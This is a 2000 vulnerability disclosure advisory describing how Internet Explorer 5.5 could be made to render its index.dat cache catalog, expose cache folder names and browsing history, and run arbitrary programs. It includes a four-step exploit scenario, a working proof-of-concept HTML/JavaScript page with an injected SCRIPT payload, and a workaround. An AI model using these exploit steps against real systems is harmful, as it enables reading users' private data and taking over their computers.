OBJECT TYPE="text/html" may allow executing arbitrary programs in IE 5.5

[Georgi Guninski <guninski () GUNINSKI COM>]

Georgi Guninski security advisory #29, 2000

OBJECT TYPE="text/html" may allow executing arbitrary programs in IE 5.5

Systems affected:
IE 5.5 probably 5.x and Outlook/Outlook Express, have not tested

Risk: High
Date: 23 November 2000

Legal Notice:
This Advisory is Copyright (c) 2000 Georgi Guninski. You may distribute
it unmodified.
You may not modify it and distribute it or distribute parts of it
without the author's
written permission.

Disclaimer:
The opinions expressed in this advisory and program are my own and not
of any company.
The usual standard disclaimer applies, especially the fact that Georgi
Guninski
is not liable for any damages caused by direct or  indirect use of the
information
or functionality provided by this advisory or program.
Georgi Guninski, bears no responsibility for content or misuse of this
advisory or program or
any derivatives thereof.

Announcement:
I have set up an experimental mailing list about client and web security
-
there you may learn faster about my discoveries and how to protect your
clients.
Check: http://www.guninski.com/mailinglist.html

Description:
Note: This is completely different issue from Advisory #28
"IE 5.x/Outlook allows executing arbitrary programs using .chm files and
temporary internet files folder"
though both use some common stuff.
There is a security vulnerability in IE 5.5 (probably 5.x and Outlook)
which allows
executing arbitratrary programs using OBJECT TYPE="text/html" and
parsing index.dat
by revealing the location of temporary internet files folder.
This may lead to taking full control over user's computer.

Details:

Backround:
If one can inject a file on user's local disk and know its location it
is possible to execute
arbitrary programs in at least two ways:
1) window.showHelp("c:\\dir\\hostile.chm")
2) <OBJECT CLASSID="clsid:000000000-0000-0000-00000-000000000002"
CODEBASE="C:\DIR\HOSTILE.EXE">
So the question arise how to inject a specified file on user's disk.
A good way is to use the Temporary Internet Files Folder which contain
cached documents and files.
The problem with it is there are several subfolders with random names.
But there is a special file "index.dat" which is something like a
catalog or registry which
contains all visited URLs and which is more important the names of the
random folders in its beginning.
It is locatated in C:/WINDOWS/Temporary Internet Files/Content.IE5/
under Win9x and in
C:/Documents and Settings/USERNAME/Local Settings/Temporary Internet
Files/Content.IE5/
under Win2K - so under Win2K the username of the current user must be
known or guessed which makes things
more difficult.
It is possible to inject JavaScript in it by just doing:
window.open("http://somehost/index.html?<SCRIPT>JSCODE</SCRIPT>")
because this URL shall be written
in it.
So if it can be parsed by IE and the JavaScript be executed the names of
the random folders
will be known.
But Microsoft tries to prevent parsing non-HTML files and they have
issued a security bulletin
in August:
http://www.microsoft.com/technet/security/bulletin/MS00-055.asp
But it is possible to parse (render) non-HTML files in the following
way:
<OBJECT TYPE="text/html" DATA="file://c:/file.dat"></OBJECT>
So the exploit scenario is:
1) inject JavaScript in index.dat by
window.open("http://somehost/index.html?<SCRIPT>JSCODE</SCRIPT>")
The JavaScript is executed in index.dat and has access to its content,
which allow to find the
random directory names
2) parse/render index.dat by:
<OBJECT DATA="file://C:/WINDOWS/Temporary Internet
Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200
HEIGHT=200></OBJECT>
3) After the Temporary internet Files Folders are known inject for
example chm files by:
<OBJECT DATA="chm1.chm" TYPE="text/html"></OBJECT>
4) Do window.showHelp("FOUNDRANDOMDIRECTORY\\chm1[1].chm");

The presense of the random temporary internet files folders in index.dat
is very dangerous -
it means that every Cross Frame Security vulnerability or vulnerability
that reads local files
may lead to executing arbitrary programs. This means that a lot of my
previous vulnerabilities
are much more serious that I have realized then.


The code is:
--------parsedat.html------------------------------------------------
This demo is for Windows 9x - you must modify the source for Win2K.
You may need to wait a few minutes if you have slow computer. If you
have Pentium 500 or better
or use Win2K probably much less.
It is expected a window with location "about:blank" to be opened
containing index.dat -
the file where the random names of temporary internet files directories
are kept
(they are random names in the beginning of the window) and the list of
all visited URLs
among other stuff. Once the temporary internet files directories are
know it is possible to
execute arbitrary programs thru cached files and showHelp() or OBJECT
CODEBASE="...".
If you don't see a window with location "about:blank" and content of
index.dat close IE and
visit the page again.
<SCRIPT>
b=window.open("http://www.guninski.com/empty2.html?<SCRIPT>a=window.open();a.document.body.innerHTML=escape(document.body.innerHTML)</"+"SCRIPT>");
s='<OBJECT DATA="file://C:/WINDOWS/Temporary Internet
Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200
HEIGHT=200></OBJECT>';
//s='<OBJECT DATA="file://C:/Documents and Settings/Administrator/Local
Settings/Temporary Internet Files/Content.IE5/index.dat"
TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT>';
// ^^^ This is for Win2K ------------you must change "Administrator" to
the actual user name
setTimeout("document.writeln(s)",5000);
</SCRIPT>
---------------------------------------------------------------------

Workaround:
Disable Active Scripting and move the location of the Temporary Internet
Files Folder to
unpredicatable location

Demonstration which opens index.dat which contains the Temporary
Internet Files Folders and
the list of all visited URLs is available:
http://www.guninski.com/parsedat.html

Vendor status:
Microsoft was contacted on 15 November 2000.

Check my experimental mailing list at:
http://www.guninski.com/mailinglist.html

Regards,
Georgi Guninski
http://www.guninski.com